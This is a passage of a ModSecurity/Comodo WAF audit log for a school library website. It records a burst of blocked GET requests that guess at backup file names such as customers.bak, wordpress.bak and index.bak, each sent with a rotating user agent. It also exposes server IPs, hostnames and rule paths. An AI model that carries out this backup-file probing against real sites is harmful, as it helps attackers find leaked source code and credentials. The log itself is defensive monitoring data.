Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bec3820d-Z-- --3177ad15-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSAAAAAIQ 103.236.140.4 55654 103.236.140.4 8181 --3177ad15-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 93032104 --3177ad15-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3177ad15-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855124331 2179 (- - -) Stopwatch2: 1747543855124331 2179; combined=756, p1=371, p2=356, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3177ad15-Z-- --22d64923-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR_wAAAJQ 103.236.140.4 54978 103.236.140.4 8181 --22d64923-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151289865 --22d64923-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --22d64923-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855124203 5917 (- - -) Stopwatch2: 1747543855124203 5917; combined=1371, p1=349, p2=995, p3=0, p4=0, p5=26, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22d64923-Z-- --0fe9ee55-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdOgAAAME 103.236.140.4 54025 103.236.140.4 8181 --0fe9ee55-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933788 --0fe9ee55-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0fe9ee55-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855129527 4986 (- - -) Stopwatch2: 1747543855129527 4986; combined=2680, p1=2349, p2=306, p3=0, p4=0, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe9ee55-Z-- --1030b44c-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSDQAAAJM 103.236.140.4 54940 103.236.140.4 8181 --1030b44c-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151552006 --1030b44c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1030b44c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855124568 11528 (- - -) Stopwatch2: 1747543855124568 11528; combined=657, p1=328, p2=298, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1030b44c-Z-- --a7663961-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdPQAAAMU 103.236.140.4 53750 103.236.140.4 8181 --a7663961-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152240134 --a7663961-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a7663961-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855107079 29160 (- - -) Stopwatch2: 1747543855107079 29160; combined=751, p1=395, p2=329, p3=0, p4=0, p5=26, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7663961-Z-- --b887a567-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o73QAAAAA 103.236.140.4 55652 103.236.140.4 8181 --b887a567-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/55.0.2994.37 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153616387 --b887a567-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b887a567-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855121529 15309 (- - -) Stopwatch2: 1747543855121529 15309; combined=13919, p1=13567, p2=325, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b887a567-Z-- --21b8bd11-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdPwAAANc 103.236.140.4 54058 103.236.140.4 8181 --21b8bd11-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153452547 --21b8bd11-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --21b8bd11-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855132747 4734 (- - -) Stopwatch2: 1747543855132747 4734; combined=1038, p1=603, p2=406, p3=0, p4=0, p5=29, sr=242, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21b8bd11-Z-- --cad53614-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EGwAAAEo 103.236.140.4 55628 103.236.140.4 8181 --cad53614-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.2.2) Gecko/20100101 Firefox/60.2.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153026563 --cad53614-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cad53614-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855116234 22053 (- - -) Stopwatch2: 1747543855116234 22053; combined=666, p1=328, p2=311, p3=0, p4=0, p5=26, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cad53614-Z-- --25bf1504-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EIwAAAEk 103.236.140.4 55428 103.236.140.4 8181 --25bf1504-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149880838 --25bf1504-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25bf1504-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855137155 3205 (- - -) Stopwatch2: 1747543855137155 3205; combined=582, p1=307, p2=256, p3=0, p4=0, p5=19, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25bf1504-Z-- --9c43cb1a-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdSAAAANE 103.236.140.4 55616 103.236.140.4 8181 --9c43cb1a-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634508 --9c43cb1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9c43cb1a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855494800 4015 (- - -) Stopwatch2: 1747543855494800 4015; combined=1133, p1=753, p2=352, p3=0, p4=0, p5=28, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c43cb1a-Z-- --b4202910-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EKQAAAEo 103.236.140.4 55586 103.236.140.4 8181 --b4202910-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118849551 --b4202910-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b4202910-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855497272 4100 (- - -) Stopwatch2: 1747543855497272 4100; combined=965, p1=415, p2=514, p3=0, p4=0, p5=35, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4202910-Z-- --1f492233-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5ELwAAAEA 103.236.140.4 55666 103.236.140.4 8181 --1f492233-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:52.5.3) Gecko/20100101 Firefox/52.5.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150175753 --1f492233-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1f492233-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855500800 4929 (- - -) Stopwatch2: 1747543855500800 4929; combined=3572, p1=996, p2=2543, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f492233-Z-- --1394b51e-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSKAAAAIo 103.236.140.4 54980 103.236.140.4 8181 --1394b51e-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154337283 --1394b51e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1394b51e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855504448 6898 (- - -) Stopwatch2: 1747543855504448 6898; combined=976, p1=554, p2=387, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1394b51e-Z-- --e0ff420f-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdXgAAAMI 103.236.140.4 54330 103.236.140.4 8181 --e0ff420f-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1; rv:58.0.2) Gecko/20100101 Firefox/58.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634511 --e0ff420f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0ff420f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855507614 5340 (- - -) Stopwatch2: 1747543855507614 5340; combined=803, p1=389, p2=382, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0ff420f-Z-- --7b888c76-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSEwAAAIg 103.236.140.4 55456 103.236.140.4 8181 --7b888c76-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153812995 --7b888c76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7b888c76-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855494942 19745 (- - -) Stopwatch2: 1747543855494942 19745; combined=808, p1=391, p2=388, p3=0, p4=0, p5=28, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b888c76-Z-- --22274b58-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdXwAAAMw 103.236.140.4 54904 103.236.140.4 8181 --22274b58-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143836262 --22274b58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --22274b58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855510927 3933 (- - -) Stopwatch2: 1747543855510927 3933; combined=2592, p1=2191, p2=369, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22274b58-Z-- --96b03425-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSLgAAAJM 103.236.140.4 55480 103.236.140.4 8181 --96b03425-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152666118 --96b03425-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --96b03425-H-- Message: Access denied with code 403 (phase 2). Match of 